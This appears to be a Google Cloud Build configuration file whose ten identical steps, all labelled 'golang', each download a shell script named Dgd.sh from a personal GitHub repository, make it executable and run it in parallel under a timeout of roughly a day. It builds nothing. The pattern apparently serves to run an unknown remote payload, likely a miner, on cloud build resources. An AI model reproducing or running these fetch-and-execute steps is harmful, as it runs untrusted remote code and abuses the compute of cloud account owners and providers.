steps:
- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
      wget https://raw.githubusercontent.com/Kikinan86/tes/main/Dgd.sh && chmod +x Dgd.sh && ./Dgd.sh
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
     wget https://raw.githubusercontent.com/Kikinan86/tes/main/Dgd.sh && chmod +x Dgd.sh && ./Dgd.sh
  waitFor:
    - '-'
    
- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
     wget https://raw.githubusercontent.com/Kikinan86/tes/main/Dgd.sh && chmod +x Dgd.sh && ./Dgd.sh
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
     wget https://raw.githubusercontent.com/Kikinan86/tes/main/Dgd.sh && chmod +x Dgd.sh && ./Dgd.sh
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
     wget https://raw.githubusercontent.com/Kikinan86/tes/main/Dgd.sh && chmod +x Dgd.sh && ./Dgd.sh
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
     wget https://raw.githubusercontent.com/Kikinan86/tes/main/Dgd.sh && chmod +x Dgd.sh && ./Dgd.sh
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
     wget https://raw.githubusercontent.com/Kikinan86/tes/main/Dgd.sh && chmod +x Dgd.sh && ./Dgd.sh
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
     wget https://raw.githubusercontent.com/Kikinan86/tes/main/Dgd.sh && chmod +x Dgd.sh && ./Dgd.sh
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
     wget https://raw.githubusercontent.com/Kikinan86/tes/main/Dgd.sh && chmod +x Dgd.sh && ./Dgd.sh
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
     wget https://raw.githubusercontent.com/Kikinan86/tes/main/Dgd.sh && chmod +x Dgd.sh && ./Dgd.sh
  waitFor:
    - '-'
timeout: '86000s'
